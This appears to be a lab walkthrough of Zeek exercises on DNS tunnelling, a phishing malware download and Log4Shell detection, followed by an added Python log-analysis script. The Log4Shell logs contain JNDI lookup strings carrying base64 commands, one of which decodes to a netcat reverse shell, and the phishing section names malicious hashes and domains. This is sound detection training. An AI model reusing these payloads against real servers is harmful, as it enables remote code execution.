ZEEK EXERCISES
ANOMALOUS DNS
Investigate the dns-tunneling.pcap file. Investigate the dns.log file. What is the number of DNS records linked to the IPv6 address?
root@thm:~$ cd Desktop/Exercise-Files/anomalous-dns
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap
root@thm:~$ zeek -C -r dns-tunneling.pcap
root@thm:~$ ls
clear-logs.sh dns-tunneling.pcap http.log packet_filter.log
conn.log dns.log ntp.log
root@thm:~$ head dns.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_id rtt query qclass qclass_name qtype qtype_name rcode rcode_name AA TC RD RA Z answers TTLs rejected
#types time string addr port addr port enum count interval string count string count string count string bool bool bool bool count vector[string] vector[interval] bool
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp 5374 0.855652 e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com 1 C_INTERNET 15 MX 0 NOERROR F F T T 0 3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com 58.000000 F
root@thm:~$ cat dns.log | zeek-cut qtype_name
TXT
CNAME
MX
AAAA
...
root@thm:~$ cat dns.log | zeek-cut qtype_name | grep AAAA | wc -l
320
Investigate the dns-tunneling.pcap file. Investigate the conn.log file. What is the longest connection duration?
root@thm:~$ head conn.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes conn_state local_orig local_resp missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes tunnel_parents
#types time string addr port addr port enum string interval count count string bool bool count string count count count count set[string]
1623212924.825154 CcJ7pk2dFfkLv8WXfe 10.20.57.3 59580 10.10.2.22 53 udp dns 0.855652 80 175 SF - - 0 Dd 1 108 1 203 -
1623212925.678141 CglDT21NBa0XUHywyl 10.20.57.3 47888 10.10.2.22 53 udp dns 0.158643 80 175 SF - - 0 Dd 1 108 1 203 -
root@thm:~$ cat conn.log | zeek-cut duration
0.658508
0.360476
0.039498
...
root@thm:~$ cat conn.log | zeek-cut duration | sort -n
3.445874
4.238265
7.835490
9.420791
Investigate the dns-tunneling.pcap file. Investigate the dns.log file. Filter all unique DNS queries. What is the number of unique domain queries?
root@thm:~$ cat dns.log | zeek-cut query
db.rhodes.edu
4542016cb16eb15fd56e1b16c4545111d7.cisco-update.com
...
root@thm:~$ cat dns.log | zeek-cut query | rev | cut -d '.' -f 1-2 | rev | sort | uniq
_tcp.local
cisco-update.com
in-addr.arpa
ip6.arpa
rhodes.edu
ubuntu.com
root@thm:~$ cat dns.log | zeek-cut query | rev | cut -d '.' -f 1-2 | rev | sort | uniq | wc -l
6
Investigate the dns-tunneling.pcap file. There is a massive number of DNS queries sent to the same domain. This is abnormal. Let's find out which hosts are involved in this activity. Investigate the conn.log file. What is the IP address of the source host?
root@thm:~$ cat conn.log | zeek-cut id.orig_h
10.20.57.3
10.20.57.3
...
root@thm:~$ cat conn.log | zeek-cut id.orig_h | sort | uniq
10.20.57.3
fe80::202a:f0b1:7d9c:bd9e
PHISHING
Investigate the logs. What is the suspicious source address? Enter your answer in defanged format.
root@thm:~$ cd Desktop/Exercise-Files/phishing
root@thm:~$ ls
clear-logs.sh file-extract-demo.zeek hash-demo.zeek phishing.pcap
root@thm:~$ cat file-extract-demo.zeek
# Load file extract framework!
@load /opt/zeek/share/zeek/policy/frameworks/files/extract-all-files.zeek
root@thm:~$ cat hash-demo.zeek
# Enable MD5, SHA1 and SHA256 hashing for all files.
@load /opt/zeek/share/zeek/policy/frameworks/files/hash-all-files.zeek
root@thm:~$ zeek -C -r phishing.pcap
root@thm:~$ ls
clear-logs.sh conn.log dhcp.log dns.log file-extract-demo.zeek files.log hash-demo.zeek http.log
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CLYI4E3rTcU5VAMw51 HTTP 0 (empty) text/plain - 0.000000 - F 14 14 0 0 F - - - - - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 C0Bg3l4Y4wO1g2JNbl HTTP 0 (empty) application/msword - 4.386569 - F 323072 - 0 0 F - - - - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 COY5YG1s9ZuflGNT48 HTTP 0 PE application/x-dosexec - 0.498764 - F 2437120 - 0 0 F - - - - - - -
root@thm:~$ cat files.log | zeek-cut tx_hosts rx_hosts mime_type filename
23.63.254.163 10.6.27.102 text/plain -
107.180.50.162 10.6.27.102 application/msword -
107.180.50.162 10.6.27.102 application/x-dosexec -
* the only transfer that looks suspicious at first glance is the executable (application/x-dosexec); both it and the .doc were received by 10.6.27.102
root@thm:~$ BROWSER > https://gchq.github.io/
input: 10.6.27.102
recipe: defang ip addresses
output: 10[.]6[.]27[.]102
Investigate the http.log file. Which domain address were the malicious files downloaded from? Enter your answer in defanged format.
root@thm:~$ cat http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1561667874.713411 CLYI4E3rTcU5VAMw51 10.6.27.102 49157 23.63.254.163 80 1 GET www.msftncsi.com /ncsi.txt - 1.1 Microsoft NCSI - 0 14 200 OK - - (empty) - - - - - - Fpgan59p6uvNzLFja - text/plain
1561667889.643717 C0Bg3l4Y4wO1g2JNbl 10.6.27.102 49159 107.180.50.162 80 1 GET smart-fax.com /Documents/Invoice&MSO-Request.doc - 1.1 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - 0 323072 200 OK - - (empty) - - - - - - FB5o2Hcauv7vpQ8y3 - application/msword
1561667898.911759 COY5YG1s9ZuflGNT48 10.6.27.102 49162 107.180.50.162 80 1 GET smart-fax.com /knr.exe - 1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) - 0 2437120 200 OK - - (empty) - - - - - - FOghls3WpIjKpvXaEl - application/x-dosexec
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
root@thm:~$ BROWSER > https://gchq.github.io/
input: smart-fax.com
recipe: defang url
output: smart-fax[.]com
Investigate the malicious document in VirusTotal. What kind of file is associated with the malicious document?
* the malicious file is most likely /knr.exe
root@thm:~$ zeek -C -r phishing.pcap hash-demo.zeek
* running the pcap through hash-demo.zeek populates the hash fields (md5, sha1) in files.log
root@thm:~$ cat files.log
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted extracted_cutoff extracted_size
#types time string set[addr] set[addr] set[string] string count set[string] string string interval bool bool count count count count bool string string string string string bool count
1561667874.743959 Fpgan59p6uvNzLFja 23.63.254.163 10.6.27.102 CI5U2K3Zk6D31MnLp8 HTTP 0 SHA1,MD5 text/plain - 0.000000 - F 14 14 0 0 F - cd5a4d3fdd5bffc16bf959ef75cf37bc 33bf88d5b82df3723d5863c7d23445e345828904 - - - -
1561667889.703239 FB5o2Hcauv7vpQ8y3 107.180.50.162 10.6.27.102 Ch8wOn2b7M249xNQ12 HTTP 0 SHA1,MD5 application/msword - 4.386569 - F 323072 - 0 0 F - b5243ec1df7d1d5304189e7db2744128 a66bd2557016377dfb95a87c21180e52b23d2e4e - - - -
1561667899.060086 FOghls3WpIjKpvXaEl 107.180.50.162 10.6.27.102 Ce5njOG0IJsxzOL08 HTTP 0 SHA1,MD5,PE application/x-dosexec - 0.498764 - F 2437120 - 0 0 F - cc28e40b46237ab6d5282199ef78c464 0d5c820002cf93384016bd4a2628dcc5101211f4 - - - -
# correlate files.log with http.log: the files.log fuid appears in the resp_fuids column of the http.log request that fetched the file
# /knr.exe's uid is COY5YG1s9ZuflGNT48 in the http.log file
# /Documents/Invoice&MSO-Request.doc uid is C0Bg3l4Y4wO1g2JNbl in the http.log file
root@thm:~$ cat files.log | zeek-cut mime_type md5
text/plain cd5a4d3fdd5bffc16bf959ef75cf37bc
application/msword b5243ec1df7d1d5304189e7db2744128
application/x-dosexec cc28e40b46237ab6d5282199ef78c464
root@thm:~$ BROWSER > https://www.virustotal.com/
search: b5243ec1df7d1d5304189e7db2744128
relations > bundled files
Bundled Files (41)
Scanned Detections File type Name
2024-11-04 10/61 VBA ThisDocument.cls
2024-05-23 6/63 VBA
2024-12-23 0/61 Text PROJECTwm
2024-11-08 0/62 ? [1]CompObj
2024-12-06 0/62 Text VBA_P-code.txt
Investigate the extracted malicious .exe file. What is the given file name in Virustotal?
root@thm:~$ BROWSER > https://www.virustotal.com/
search: cc28e40b46237ab6d5282199ef78c464
detection:
749e161661290e8a2d190b1a66469744127bc25bf46e5d0c6f2e835f4b92db18
PleaseWaitWindow.exe
Investigate the malicious .exe file in VirusTotal. What is the contacted domain name? Enter your answer in defanged format.
root@thm:~$ BROWSER > https://www.virustotal.com/
search: cc28e40b46237ab6d5282199ef78c464
behavior > dns resolutions
DNS Resolutions
dunlop.hopto.org
query.prod.cms.rt.microsoft.com
res.public.onecdn.static.microsoft
www.microsoft.com
125.21.88.13.in-addr.arpa
root@thm:~$ BROWSER > cyberchef.io
input: hopto.org
recipe: defang url
output: hopto[.]org
Investigate the http.log file. What is the request name of the downloaded malicious .exe file?
root@thm:~$ cat http.log | zeek-cut id.orig_h host uri
10.6.27.102 www.msftncsi.com /ncsi.txt
10.6.27.102 smart-fax.com /Documents/Invoice&MSO-Request.doc
10.6.27.102 smart-fax.com /knr.exe
LOG4J
Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the signature.log file. What is the number of signature hits?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ cat signatures.log
#fields ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count
#types time string addr port addr port enum string string string count count
1640023652.109820 CMzs07mEkv4GvJc68 192.168.56.102 389 172.17.0.2 36820 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xc8\x02\x01\x02d\x81\xc2\x04-Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04\x0bobjectC... - -
1640025554.665741 CO8DsW2tkhOb5990Vc 192.168.56.102 389 172.17.0.2 36822 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xd0\x02\x01\x02d\x81\xca\x045Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04... - -
1640026858.967970 CbpVAq3ecDRo6YocGj 192.168.56.102 389 172.17.0.2 36824 Signatures::Sensitive_Signature log4j_javaclassname_tcp 192.168.56.102: log4j_javaclassname_tcp 0\x81\xe4\x02\x01\x02d\x81\xde\x04IBasic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://19... - -
root@thm:~$ cat signatures.log | zeek-cut event_msg
192.168.56.102: log4j_javaclassname_tcp
192.168.56.102: log4j_javaclassname_tcp
192.168.56.102: log4j_javaclassname_tcp
Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. Which tool is used for scanning?
root@thm:~$ head -n 20 http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1640023505.960608 C46qhk4zZ9Oa6yAoY4 172.17.0.1 60314 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 91 400 (empty) - - (empty) - - - - - - Fq5jbu3EpCk5tV3f18 - text/json
1640023652.119439 CFZWci2SfK49pWcMq4 172.17.0.2 51832 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitQ8v7ygBW4i.class - 1.1 Java/1.8.0_181 - 0 1216 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fm2Pk636DiMArmDn03 - application/x-java-applet
1640023652.008511 Ckl0FV3jumRTSjCk37 172.17.0.1 60316 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FZiMgW29483QEvS57h - text/plain
1640025510.063581 CVW1x93htcyS2qlsaf 172.17.0.1 60318 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 435 400 (empty) - - (empty) - - - - - - FQJTPb2FVAOerMJdh7 - text/html
1640025554.667458 COvB5D4kdBsF0OAjGg 172.17.0.2 51834 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitSMMZvT8GXL.class - 1.1 Java/1.8.0_181 - 0 1221 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fz7ckavJbacqKLihd - application/x-java-applet
1640025554.661073 CiHHhm4BncLehOzMN3 172.17.0.1 60320 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FItcX62GLQzrl4Cbzf - text/plain
1640026858.968993 C5kyKu3m6RIbCUqXd9 172.17.0.2 51836 192.168.56.102 443 1 GET 192.168.56.102:443 /Exploit6HHc3BcVzI.class - 1.1 Java/1.8.0_181 - 0 1236 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FlPEpD1E3EAvvgGJpj - application/x-java-applet
1640026858.960398 CWFbla33TCz3r1OGOa 172.17.0.1 60324 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - Fl61wz3Ge2v4C7LYI4 - text/plain
1640027823.052868 C0AIBt146FDQqZgrsc 172.17.0.1 60326 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FRCUNW1if8EiKUkky2 - text/plain
1640027823.066566 Ck73J33j2cnDW3d1Le 172.17.0.1 60330 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 ${jndi:ldap://127.0.0.1:1389} - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvFr0m3lUQZBzNEDGg - text/json
1640027823.072191 CTHREk1CtzRIg0iWt8 172.17.0.1 60334 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FjiVHw36zI70gLb9wi - text/json
1640027823.077510 CnHDGlNx3DEdaUg6b 172.17.0.1 60338 172.17.0.2 8080 1 GET 172.17.0.2:8080 / ${jndi:ldap://127.0.0.1:1389} 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvR55t24LnhgxI14G3 - text/json
root@thm:~$ cat http.log | zeek-cut user_agent
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
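The zeek-cut pipelines from the anomalous-DNS section, the files.log/http.log correlation from the phishing section and the CVE_2021_44228::LOG4J_RCE tagging above, re-implemented as one worked example added here (it is not part of the exercise files): a small parser for Zeek's TSV logs driven by the #fields header, per-domain DNS tunnelling statistics, the join of files.log fuid to http.log resp_fuids, and a defender-side filter for the Log4j tag or a JNDI string in client-controlled request fields. Function names are my own; the sample rows are constructed and abbreviated, reusing a few values shown in the logs above.

```python
"""Added worked example (not part of the exercise files): parse Zeek TSV logs by
their #fields header and reproduce the walkthrough's analyses. Sample rows are
constructed and abbreviated (short uids, only the columns used)."""
from collections import Counter


def parse_zeek_log(text):
    """Turn Zeek's TSV log format into a list of dicts keyed by #fields."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            if fields is None:
                raise ValueError("data row before #fields header")
            records.append(dict(zip(fields, line.split("\t"))))
    return records


def registered_domain(name, labels=2):
    """Keep the last `labels` labels, like `rev | cut -d '.' -f 1-2 | rev`."""
    return ".".join(name.rstrip(".").split(".")[-labels:])


def dns_tunneling_stats(records):
    """Per-qtype counts plus, per registered domain, query volume and the
    number/length of distinct subdomains: one domain receiving many distinct,
    long, hex-looking subdomains is the tunnelling profile in the exercise."""
    by_qtype = Counter(r["qtype_name"] for r in records)
    per_domain = {}
    for r in records:
        dom = registered_domain(r["query"])
        sub = r["query"][: len(r["query"]) - len(dom)].rstrip(".")
        d = per_domain.setdefault(dom, {"queries": 0, "subs": set(), "sub_len": 0})
        d["queries"] += 1
        d["subs"].add(sub)
        d["sub_len"] += len(sub)
    summary = {dom: {"queries": d["queries"],
                     "unique_subdomains": len(d["subs"]),
                     "avg_subdomain_len": d["sub_len"] / d["queries"]}
               for dom, d in per_domain.items()}
    return {"by_qtype": dict(by_qtype), "per_domain": summary}


def correlate_files(http_records, files_records):
    """Join files.log to http.log on the file id: each files.log `fuid` appears
    in the http.log `resp_fuids` column (comma-separated if several)."""
    by_fuid = {}
    for h in http_records:
        for fuid in h["resp_fuids"].split(","):
            if fuid != "-":
                by_fuid[fuid] = h
    joined = []
    for f in files_records:
        h = by_fuid.get(f["fuid"], {})
        joined.append({"fuid": f["fuid"], "mime_type": f["mime_type"], "md5": f["md5"],
                       "host": h.get("host"), "uri": h.get("uri")})
    return joined


def log4j_indicators(http_records):
    """Flag requests carrying a JNDI lookup string in a client-controlled field,
    or already tagged by the CVE-2021-44228 package the exercise loads."""
    hits = []
    for h in http_records:
        client_fields = (h["uri"], h["user_agent"], h["referrer"], h["host"])
        jndi = any("${jndi:" in v.lower() for v in client_fields)
        tagged = "CVE_2021_44228::LOG4J_RCE" in h["tags"]
        if jndi or tagged:
            hits.append({"uid": h["uid"], "user_agent": h["user_agent"], "jndi": jndi})
    return hits


def _tsv(*rows):
    return "\n".join("\t".join(r) for r in rows)


# Constructed sample rows; subdomain values reuse the ones shown in dns.log above.
SAMPLE_DNS = _tsv(
    ("#fields", "ts", "uid", "id.orig_h", "query", "qtype_name"),
    ("1.0", "Ca", "10.20.57.3", "e7f1018ea0310f25bba0610936fd1cc2af.cisco-update.com", "MX"),
    ("2.0", "Cb", "10.20.57.3", "3591018ea0f08b48069ca0ffff640c1cfb.cisco-update.com", "TXT"),
    ("3.0", "Cc", "10.20.57.3", "4542016cb16eb15fd56e1b16c4545111d7.cisco-update.com", "AAAA"),
    ("4.0", "Cd", "fe80::202a:f0b1:7d9c:bd9e", "db.rhodes.edu", "AAAA"),
)
SAMPLE_HTTP = _tsv(
    ("#fields", "uid", "host", "uri", "referrer", "user_agent", "tags", "resp_fuids"),
    ("C0Bg3l", "smart-fax.com", "/Documents/Invoice&MSO-Request.doc", "-", "Mozilla/5.0",
     "(empty)", "FB5o2H"),
    ("COY5YG", "smart-fax.com", "/knr.exe", "-", "Mozilla/4.0", "(empty)", "FOghls"),
    ("Ck73J3", "172.17.0.2:8080", "/", "-", "${jndi:ldap://127.0.0.1:1389}",
     "CVE_2021_44228::LOG4J_RCE", "FvFr0m"),
    ("C0AIBt", "172.17.0.2:8080", "/", "-", "Mozilla/5.0 (compatible; Nmap Scripting Engine)",
     "CVE_2021_44228::LOG4J_RCE", "FRCUNW"),
)
SAMPLE_FILES = _tsv(
    ("#fields", "fuid", "mime_type", "md5"),
    ("FB5o2H", "application/msword", "b5243ec1df7d1d5304189e7db2744128"),
    ("FOghls", "application/x-dosexec", "cc28e40b46237ab6d5282199ef78c464"),
)

if __name__ == "__main__":
    print(dns_tunneling_stats(parse_zeek_log(SAMPLE_DNS))["per_domain"])
    print(correlate_files(parse_zeek_log(SAMPLE_HTTP), parse_zeek_log(SAMPLE_FILES)))
    print(log4j_indicators(parse_zeek_log(SAMPLE_HTTP)))
```

Point `parse_zeek_log` at a real dns.log, http.log or files.log produced by `zeek -r` and the same functions work on the full logs; tabs are the column separator there too.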
Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. What is the extension of the exploit file?
root@thm:~$ head -n 20 http.log
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types
#types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string]
1640023505.960608 C46qhk4zZ9Oa6yAoY4 172.17.0.1 60314 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 91 400 (empty) - - (empty) - - - - - - Fq5jbu3EpCk5tV3f18 - text/json
1640023652.119439 CFZWci2SfK49pWcMq4 172.17.0.2 51832 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitQ8v7ygBW4i.class - 1.1 Java/1.8.0_181 - 0 1216 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fm2Pk636DiMArmDn03 - application/x-java-applet
1640023652.008511 Ckl0FV3jumRTSjCk37 172.17.0.1 60316 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FZiMgW29483QEvS57h - text/plain
1640025510.063581 CVW1x93htcyS2qlsaf 172.17.0.1 60318 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 435 400 (empty) - - (empty) - - - - - - FQJTPb2FVAOerMJdh7 - text/html
1640025554.667458 COvB5D4kdBsF0OAjGg 172.17.0.2 51834 192.168.56.102 443 1 GET 192.168.56.102:443 /ExploitSMMZvT8GXL.class - 1.1 Java/1.8.0_181 - 0 1221 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - Fz7ckavJbacqKLihd - application/x-java-applet
1640025554.661073 CiHHhm4BncLehOzMN3 172.17.0.1 60320 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FItcX62GLQzrl4Cbzf - text/plain
1640026858.968993 C5kyKu3m6RIbCUqXd9 172.17.0.2 51836 192.168.56.102 443 1 GET 192.168.56.102:443 /Exploit6HHc3BcVzI.class - 1.1 Java/1.8.0_181 - 0 1236 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FlPEpD1E3EAvvgGJpj - application/x-java-applet
1640026858.960398 CWFbla33TCz3r1OGOa 172.17.0.1 60324 172.17.0.2 8080 1 GET 127.0.0.1:8080 / - 1.1 SecurityNik Testing - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - Fl61wz3Ge2v4C7LYI4 - text/plain
1640027823.052868 C0AIBt146FDQqZgrsc 172.17.0.1 60326 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 13 200 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FRCUNW1if8EiKUkky2 - text/plain
1640027823.066566 Ck73J33j2cnDW3d1Le 172.17.0.1 60330 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 ${jndi:ldap://127.0.0.1:1389} - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvFr0m3lUQZBzNEDGg - text/json
1640027823.072191 CTHREk1CtzRIg0iWt8 172.17.0.1 60334 172.17.0.2 8080 1 GET 172.17.0.2:8080 / - 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FjiVHw36zI70gLb9wi - text/json
1640027823.077510 CnHDGlNx3DEdaUg6b 172.17.0.1 60338 172.17.0.2 8080 1 GET 172.17.0.2:8080 / ${jndi:ldap://127.0.0.1:1389} 1.1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - 0 91 400 (empty) - - CVE_2021_44228::LOG4J_RCE - - - - - - FvR55t24LnhgxI14G3 - text/json
root@thm:~$ cat http.log | zeek-cut uri | sort | uniq
/
/Exploit6HHc3BcVzI.class
/ExploitQ8v7ygBW4i.class
/ExploitSMMZvT8GXL.class
/testing1
/testing123
testing1
Investigate the log4shell.pcapng file with the detection-log4j.zeek script. Investigate the log4j.log file. Decode the base64 commands. What is the name of the created file?
root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek log4shell.pcapng
root@thm:~$ cat detection-log4j.zeek
# Load scan-NG Package!
@load /opt/zeek/share/zeek/site/cve-2021-44228
root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
clear-logs.sh detection-log4j.zeek http.log log4shell.pcapng packet_filter.log weird.log
conn.log files.log log4j.log notice.log signatures.log
root@thm:~$ head -n 20 log4j.log
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1640023652.008511 Ckl0FV3jumRTSjCk37 / 192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=} F T
1640025554.661073 CiHHhm4BncLehOzMN3 / 192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg== 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==} F T
1640026858.960398 CWFbla33TCz3r1OGOa / 192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg== 192.168.56.102:389 192.168.56.102 389 GET T X-API-VERSION ${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==} F T
1640027823.052868 C0AIBt146FDQqZgrsc / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T X-API-VERSION ${jndi:ldap://127.0.0.1:1389} F T
1640027823.066566 Ck73J33j2cnDW3d1Le / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T USER-AGENT ${jndi:ldap://127.0.0.1:1389} F T
1640027823.072191 CTHREk1CtzRIg0iWt8 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T COOKIE ${jndi:ldap://127.0.0.1:1389} F T
1640027823.077510 CnHDGlNx3DEdaUg6b / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T REFERER ${jndi:ldap://127.0.0.1:1389} F T
1640027823.089508 CHEJYb2xPpVeg4qKL6 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT-LANGUAGE ${jndi:ldap://127.0.0.1:1389} F T
1640027823.094029 CNQqim3QxR3vjdrRsb / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T ACCEPT-ENCODING ${jndi:ldap://127.0.0.1:1389} F T
1640027823.095902 ChqYJG3NwzJd7ncOf8 / 127.0.0.1:1389 127.0.0.1:1389 127.0.0.1 1389 GET T UPGRADE-INSECURE-REQUESTS ${jndi:ldap://127.0.0.1:1389} F T
